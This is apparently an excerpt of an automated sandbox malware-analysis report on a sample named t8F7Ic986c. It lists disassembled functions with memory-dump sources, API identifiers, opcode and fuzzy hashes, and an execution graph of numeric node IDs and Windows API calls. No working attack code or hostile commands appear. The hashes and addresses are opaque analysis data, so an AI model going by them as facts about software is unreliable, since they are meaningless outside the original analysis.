                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                    • String ID: csm$csm
                                                    • API String ID: 4108983575-3733052814
                                                    • Opcode ID: 17ae4d1ae201bf5ff5bd0027379854c8b70b62102f0a47126d9ef4f452e95dfa
                                                    • Instruction ID: cf5e1d51bb9c836e4de9b11666ad1ce12af940239f736813bbb24a5875005e43
                                                    • Opcode Fuzzy Hash: 17ae4d1ae201bf5ff5bd0027379854c8b70b62102f0a47126d9ef4f452e95dfa
                                                    • Instruction Fuzzy Hash: 4E515032908E828AEB648F17948426976A0FB46BA5F144176FF9D47BE5CF3CE459C700
                                                    Function 00007FFE148BA640 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: NameName::
                                                    • String ID: %lf
                                                    • API String ID: 1333004437-2891890143
                                                    • Opcode ID: d5298ca127414f2580a14f53600500394f249bd586459cb27b5a413574188a2a
                                                    • Instruction ID: 162d7a2983eb44388530bff4f9116ac5e02872313ce5de98db0c38f3ff117437
                                                    • Opcode Fuzzy Hash: d5298ca127414f2580a14f53600500394f249bd586459cb27b5a413574188a2a
                                                    • Instruction Fuzzy Hash: E531C67290CE9189EA20CB26E8902B9B3A0FB87794F8481B1F9DD87765CF3CD509C740
                                                    Function 00007FFE148B2400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148B243E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abortterminate
                                                    • String ID: MOC$RCC$csm
                                                    • API String ID: 661698970-2671469338
                                                    • Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                    • Instruction ID: 238ec9fd24a209618b338e790c8e54bd6575b2e770a68b9a144427b62925cbc4
                                                    • Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                    • Instruction Fuzzy Hash: F1F0AF36918A42C9EB505F26E1C51693260FB49B64F0855B2EB4C03372CF3CE4A4CB02
                                                    Function 00007FFE148BE8D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __C_specific_handler.LIBVCRUNTIME ref: 00007FFE148BE8E0
                                                      • Part of subcall function 00007FFE148BEB20: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE148BEBE0
                                                      • Part of subcall function 00007FFE148BEB20: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE148BE8E5), ref: 00007FFE148BEC2F
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148BE90A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                    • String ID: csm$f
                                                    • API String ID: 2451123448-629598281
                                                    • Opcode ID: a035d3fd41b4857b63fc8c8a091b4ec2a9cd294fa95b54752a5867f425a35df2
                                                    • Instruction ID: 8287179fc10f2bb2b41e34bd159c282e12898c690b76ec49c9e6f7134086ba0c
                                                    • Opcode Fuzzy Hash: a035d3fd41b4857b63fc8c8a091b4ec2a9cd294fa95b54752a5867f425a35df2
                                                    • Instruction Fuzzy Hash: F6E0E531C0CE4298EB606B23B1C127E26A0BF06B74F1480B1FA48073A6CF3CD4A88702
                                                    Function 00007FFE148B9BEC Relevance: 6.2, APIs: 4, Instructions: 193COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: a1e38ebea857c677fef0ae28369812a07d13309e9ca06832320585fad5392e0f
                                                    • Instruction ID: 5504bf6370e3a158e222f3340e01efea5a5dadb75a8e7fbbcb79423911582230
                                                    • Opcode Fuzzy Hash: a1e38ebea857c677fef0ae28369812a07d13309e9ca06832320585fad5392e0f
                                                    • Instruction Fuzzy Hash: CE914A72E08F668DFB118B66D8803EC27A1BB06768F9540B5EE4D177A5DF7CA849C340
                                                    Function 00007FFE148BA378 Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$NameName::
                                                    • String ID:
                                                    • API String ID: 168861036-0
                                                    • Opcode ID: acbfbbe0c511e3698657a471b19ca6b2ed0dcf73ad2ddb8601ece0c2f14e2016
                                                    • Instruction ID: ab1bf7dfacaaf250f78813a0a99bda3d7dcda20fb85748da71e8e8d30b197e14
                                                    • Opcode Fuzzy Hash: acbfbbe0c511e3698657a471b19ca6b2ed0dcf73ad2ddb8601ece0c2f14e2016
                                                    • Instruction Fuzzy Hash: 18516C72A18E568CEB11CF66E8807BC77A0BB46764F988071EA0E477A5CF3DE549C740
                                                    Function 00007FFE148BC79C Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: e0ef2515f9d96f2c1e3124781f903358e6b97f310e73e21928eaf0e85632baf0
                                                    • Instruction ID: 9d886b8ce61d7f7befc25a0781c89743c58e7991dc3059930c100e7b94388bcc
                                                    • Opcode Fuzzy Hash: e0ef2515f9d96f2c1e3124781f903358e6b97f310e73e21928eaf0e85632baf0
                                                    • Instruction Fuzzy Hash: 98416972A08B5589FB01CF69D8803AC37B0F746B58F988079EA8D677A9DF7C9449C310
                                                    Function 00007FFE148B4710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$CreateFrameInfo
                                                    • String ID: csm
                                                    • API String ID: 2697087660-1018135373
                                                    • Opcode ID: 358f0a59b8303083cc6c94dc4aef9fef89783b629f176a2df5e4f3a0ac74caac
                                                    • Instruction ID: c373d8cd2815cf825c956d7947511c73ade3c19bfbafe98ac5f0aca6ff186188
                                                    • Opcode Fuzzy Hash: 358f0a59b8303083cc6c94dc4aef9fef89783b629f176a2df5e4f3a0ac74caac
                                                    • Instruction Fuzzy Hash: 00515E36618B818AD620EB17E48126E77A4FB8ABA4F140575EF8D07B65CF3CE465CB01
                                                    Function 00007FFE148B9AD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: void$void
                                                    • API String ID: 2943138195-3746155364
                                                    • Opcode ID: 9af3552a770d8b2508846e27a2f9d583d39522cb9c209f0b45164149649c8dbb
                                                    • Instruction ID: 81610597e75c8314faec84ae6de85f8b6a14502120c38b321ad0559d19f6b12d
                                                    • Opcode Fuzzy Hash: 9af3552a770d8b2508846e27a2f9d583d39522cb9c209f0b45164149649c8dbb
                                                    • Instruction Fuzzy Hash: CE310872E18E659CFB108BA5D8814EC37B0BB4A758F840176EE4E62B69DF3C9148C750
                                                    Function 00007FFE148B604F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionRaise
                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                    • API String ID: 3685223789-3176238549
                                                    • Opcode ID: c4c42506f718241a9074068d813cd8d6875e169c3d23e947c08b75e606e33840
                                                    • Instruction ID: 3399324d074d0203722b2b2c3b10c835f6de00d9f783f6f1d36cb349d11eb6fd
                                                    • Opcode Fuzzy Hash: c4c42506f718241a9074068d813cd8d6875e169c3d23e947c08b75e606e33840
                                                    • Instruction Fuzzy Hash: 3601B171A29E0695EE40AB1AE8D05B86320FF41BA8F8050B1F50E077BAEF6CD40DC701
                                                    Function 00007FFE148B63F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                    • Instruction ID: fe3b0638edef58db79980c3ae3778946577b6090a82d6a1b415d4ef8f4905af8
                                                    • Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                    • Instruction Fuzzy Hash: D6114F32618F8182EB518F16F48026977A5FB89B98F584271EE8C07B69DF3DD555CB00
                                                    Function 00007FFE148B672C Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FFE148B65B9,?,?,?,?,00007FFE148BFA12,?,?,?,?,?), ref: 00007FFE148B674B
                                                    • SetLastError.KERNEL32(?,?,?,00007FFE148B65B9,?,?,?,?,00007FFE148BFA12,?,?,?,?,?), ref: 00007FFE148B67D4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 0de69f98998d971f2423aba4fea73eca4e0f6e3aee6112935789783a1afdc9a5
                                                    • Instruction ID: db7b23100ed42ea45bb8f5d4222ca38e75679be15cc3e7421d11e06d6941aef6
                                                    • Opcode Fuzzy Hash: 0de69f98998d971f2423aba4fea73eca4e0f6e3aee6112935789783a1afdc9a5
                                                    • Instruction Fuzzy Hash: 1A118134A09E1246FE209B23A8D46742290BF46BB4F8447B4FD2E137F5DF2CE8598715

                                                    Execution Graph

                                                    Execution Coverage:11.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:13.6%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:27
                                                    execution_graph 25320 7ff6c038bd78 25321 7ff6c038bd9e GetModuleHandleW 25320->25321 25322 7ff6c038bde8 25320->25322 25321->25322 25331 7ff6c038bdab 25321->25331 25337 7ff6c038f318 EnterCriticalSection 25322->25337 25331->25322 25338 7ff6c038bf30 GetModuleHandleExW 25331->25338 25339 7ff6c038bf81 25338->25339 25340 7ff6c038bf5a GetProcAddress 25338->25340 25342 7ff6c038bf91 25339->25342 25343 7ff6c038bf8b FreeLibrary 25339->25343 25340->25339 25341 7ff6c038bf74 25340->25341 25341->25339 25342->25322 25343->25342 28229 7ff6c038beac 41 API calls 2 library calls 27735 7ff6c038114f 27736 7ff6c0381082 27735->27736 27737 7ff6c0381880 _com_raise_error 14 API calls 27736->27737 27737->27736 27751 7ff6c0380360 27752 7ff6c0380417 27751->27752 27753 7ff6c038039f 27751->27753 27754 7ff6c036aaa0 48 API calls 27752->27754 27755 7ff6c036aaa0 48 API calls 27753->27755 27756 7ff6c038042b 27754->27756 27757 7ff6c03803b3 27755->27757 27758 7ff6c036da14 48 API calls 27756->27758 27759 7ff6c036da14 48 API calls 27757->27759 27763 7ff6c03803c2 memcpy_s 27758->27763 27759->27763 27760 7ff6c0351fa0 31 API calls 27761 7ff6c03804c1 27760->27761 27764 7ff6c035250c SetDlgItemTextW 27761->27764 27762 7ff6c0380546 27766 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27762->27766 27763->27760 27763->27762 27765 7ff6c038054c 27763->27765 27768 7ff6c03804d6 SetWindowTextW 27764->27768 27767 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27765->27767 27766->27765 27769 7ff6c0380552 27767->27769 27770 7ff6c038051c 27768->27770 27771 7ff6c03804ef 27768->27771 27772 7ff6c03822a0 _handle_error 8 API calls 27770->27772 27771->27770 27773 7ff6c0380541 27771->27773 27774 7ff6c038052f 27772->27774 27775 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27773->27775 27775->27762 28223 7ff6c0382070 28224 7ff6c0382086 _com_error::_com_error 28223->28224 28225 7ff6c0383ff8 Concurrency::cancel_current_task 2 API calls 28224->28225 28226 7ff6c0382097 28225->28226 28227 7ff6c0381880 _com_raise_error 14 API calls 28226->28227 28228 7ff6c03820e3 28227->28228 25414 7ff6c0381411 25415 7ff6c0381349 25414->25415 25416 7ff6c0381880 _com_raise_error 14 API calls 25415->25416 25417 7ff6c0381388 25416->25417 25418 7ff6c037b110 25761 7ff6c035255c 25418->25761 25420 7ff6c037b15b 25421 7ff6c037be13 25420->25421 25422 7ff6c037b16f 25420->25422 25572 7ff6c037b18c 25420->25572 26047 7ff6c037f310 25421->26047 25425 7ff6c037b25b 25422->25425 25426 7ff6c037b17f 25422->25426 25422->25572 25431 7ff6c037b311 25425->25431 25437 7ff6c037b275 25425->25437 25429 7ff6c037b229 25426->25429 25430 7ff6c037b187 25426->25430 25436 7ff6c037b24b EndDialog 25429->25436 25429->25572 25441 7ff6c036aaa0 48 API calls 25430->25441 25430->25572 25769 7ff6c03522bc GetDlgItem 25431->25769 25432 7ff6c037be3a SendMessageW 25433 7ff6c037be49 25432->25433 25434 7ff6c037be55 SendDlgItemMessageW 25433->25434 25435 7ff6c037be70 GetDlgItem SendMessageW 25433->25435 25434->25435 26066 7ff6c036629c GetCurrentDirectoryW 25435->26066 25436->25572 25442 7ff6c036aaa0 48 API calls 25437->25442 25444 7ff6c037b1b6 25441->25444 25445 7ff6c037b293 SetDlgItemTextW 25442->25445 25443 7ff6c037bec7 GetDlgItem 26076 7ff6c0352520 25443->26076 26080 7ff6c0351ec4 34 API calls _handle_error 25444->26080 25450 7ff6c037b2a6 25445->25450 25448 7ff6c037b388 GetDlgItem 25454 7ff6c037b3a2 SendMessageW SendMessageW 25448->25454 25455 7ff6c037b3cf SetFocus 25448->25455 25449 7ff6c037b375 25468 7ff6c037bc45 25449->25468 25588 7ff6c037b331 EndDialog 25449->25588 25459 7ff6c037b2c0 GetMessageW 25450->25459 25450->25572 25453 7ff6c037b1c6 25458 7ff6c037b1dc 25453->25458 26081 7ff6c035250c 25453->26081 25454->25455 25460 7ff6c037b3e5 25455->25460 25461 7ff6c037b472 25455->25461 25456 7ff6c037b35a 25462 7ff6c0351fa0 31 API calls 25456->25462 25477 7ff6c037c2e3 25458->25477 25458->25572 25466 7ff6c037b2de IsDialogMessageW 25459->25466 25459->25572 25467 7ff6c036aaa0 48 API calls 25460->25467 25783 7ff6c0358d04 25461->25783 25462->25572 25466->25450 25472 7ff6c037b2f3 TranslateMessage DispatchMessageW 25466->25472 25473 7ff6c037b3ef 25467->25473 25469 7ff6c036aaa0 48 API calls 25468->25469 25474 7ff6c037bc56 SetDlgItemTextW 25469->25474 25471 7ff6c037b4ac 25793 7ff6c037ef00 25471->25793 25472->25450 26084 7ff6c035129c 25473->26084 25478 7ff6c036aaa0 48 API calls 25474->25478 26141 7ff6c0387884 25477->26141 25483 7ff6c037bc88 25478->25483 25500 7ff6c035129c 33 API calls 25483->25500 25484 7ff6c037c2e8 25495 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25484->25495 25489 7ff6c037b418 25493 7ff6c037f024 24 API calls 25489->25493 25499 7ff6c037b425 25493->25499 25502 7ff6c037c2ee 25495->25502 25499->25484 25515 7ff6c037b468 25499->25515 25531 7ff6c037bcb1 25500->25531 25512 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25502->25512 25510 7ff6c037bd5a 25516 7ff6c036aaa0 48 API calls 25510->25516 25517 7ff6c037c2f4 25512->25517 25524 7ff6c037b56c 25515->25524 26094 7ff6c037fa00 33 API calls 2 library calls 25515->26094 25526 7ff6c037bd64 25516->25526 25537 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25517->25537 25521 7ff6c0351fa0 31 API calls 25529 7ff6c037b506 25521->25529 25534 7ff6c037b59a 25524->25534 26095 7ff6c0363268 25524->26095 25549 7ff6c035129c 33 API calls 25526->25549 25529->25502 25529->25515 25531->25510 25543 7ff6c035129c 33 API calls 25531->25543 25831 7ff6c0362f18 25534->25831 25542 7ff6c037c2fa 25537->25542 25554 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25542->25554 25550 7ff6c037bcff 25543->25550 25547 7ff6c037b5cc 25846 7ff6c0367f84 25547->25846 25548 7ff6c037b5b4 GetLastError 25548->25547 25553 7ff6c037bd8d 25549->25553 25556 7ff6c036aaa0 48 API calls 25550->25556 25552 7ff6c037b58e 26098 7ff6c0379d10 12 API calls _handle_error 25552->26098 25570 7ff6c035129c 33 API calls 25553->25570 25560 7ff6c037c300 25554->25560 25561 7ff6c037bd0a 25556->25561 25571 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25560->25571 25562 7ff6c0351150 33 API calls 25561->25562 25566 7ff6c037bd22 25562->25566 25564 7ff6c037b5de 25568 7ff6c037b5e5 GetLastError 25564->25568 25569 7ff6c037b5f4 25564->25569 26128 7ff6c0352034 25566->26128 25568->25569 25573 7ff6c037b69c 25569->25573 25577 7ff6c037b6ab 25569->25577 25579 7ff6c037b60b GetTickCount 25569->25579 25574 7ff6c037bdce 25570->25574 25575 7ff6c037c306 25571->25575 26132 7ff6c03822a0 25572->26132 25573->25577 25597 7ff6c037baf9 25573->25597 25590 7ff6c0351fa0 31 API calls 25574->25590 25580 7ff6c035255c 61 API calls 25575->25580 25581 7ff6c037b9d0 25577->25581 26099 7ff6c0366414 25577->26099 25849 7ff6c0354228 25579->25849 25584 7ff6c037c364 25580->25584 25581->25588 26123 7ff6c035bd1c 33 API calls 25581->26123 25582 7ff6c037bd3e 25586 7ff6c0351fa0 31 API calls 25582->25586 25591 7ff6c037c368 25584->25591 25600 7ff6c037c409 GetDlgItem SetFocus 25584->25600 25644 7ff6c037c37d 25584->25644 25595 7ff6c037bd4c 25586->25595 25588->25456 25599 7ff6c037bdf8 25590->25599 25608 7ff6c03822a0 _handle_error 8 API calls 25591->25608 25594 7ff6c037b6ce 26111 7ff6c036b8d0 102 API calls 25594->26111 25603 7ff6c0351fa0 31 API calls 25595->25603 25612 7ff6c036aaa0 48 API calls 25597->25612 25598 7ff6c037b9f5 26124 7ff6c0351150 25598->26124 25607 7ff6c0351fa0 31 API calls 25599->25607 25604 7ff6c037c43a 25600->25604 25603->25510 25617 7ff6c035129c 33 API calls 25604->25617 25605 7ff6c037b63a 25859 7ff6c0351fa0 25605->25859 25614 7ff6c037be03 25607->25614 25609 7ff6c037ca17 25608->25609 25610 7ff6c037b6e8 25616 7ff6c036da14 48 API calls 25610->25616 25619 7ff6c037bb27 SetDlgItemTextW 25612->25619 25613 7ff6c037ba0a 25620 7ff6c036aaa0 48 API calls 25613->25620 25621 7ff6c0351fa0 31 API calls 25614->25621 25615 7ff6c037c3b4 SendDlgItemMessageW 25622 7ff6c037c3dd EndDialog 25615->25622 25623 7ff6c037c3d4 25615->25623 25624 7ff6c037b72a GetCommandLineW 25616->25624 25625 7ff6c037c44c 25617->25625 25618 7ff6c037b648 25864 7ff6c03620f4 25618->25864 25626 7ff6c0352534 25619->25626 25627 7ff6c037ba17 25620->25627 25621->25456 25622->25591 25623->25622 25628 7ff6c037b7e9 25624->25628 25629 7ff6c037b7cf 25624->25629 26146 7ff6c0368098 33 API calls 25625->26146 25631 7ff6c037bb45 SetDlgItemTextW GetDlgItem 25626->25631 25632 7ff6c0351150 33 API calls 25627->25632 26116 7ff6c037aad4 33 API calls _handle_error 25628->26116 26112 7ff6c03520b0 25629->26112 25636 7ff6c037bb93 25631->25636 25637 7ff6c037bb70 GetWindowLongPtrW SetWindowLongPtrW 25631->25637 25638 7ff6c037ba2a 25632->25638 25633 7ff6c037c460 25639 7ff6c035250c SetDlgItemTextW 25633->25639 25884 7ff6c037ce08 25636->25884 25637->25636 25643 7ff6c0351fa0 31 API calls 25638->25643 25646 7ff6c037c474 25639->25646 25640 7ff6c037b7fa 26117 7ff6c037aad4 33 API calls _handle_error 25640->26117 25651 7ff6c037ba35 25643->25651 25644->25591 25644->25615 25658 7ff6c037c4a6 SendDlgItemMessageW FindFirstFileW 25646->25658 25648 7ff6c037b675 GetLastError 25649 7ff6c037b684 25648->25649 25880 7ff6c0362004 25649->25880 25653 7ff6c0351fa0 31 API calls 25651->25653 25652 7ff6c037ce08 160 API calls 25656 7ff6c037bbbc 25652->25656 25657 7ff6c037ba43 25653->25657 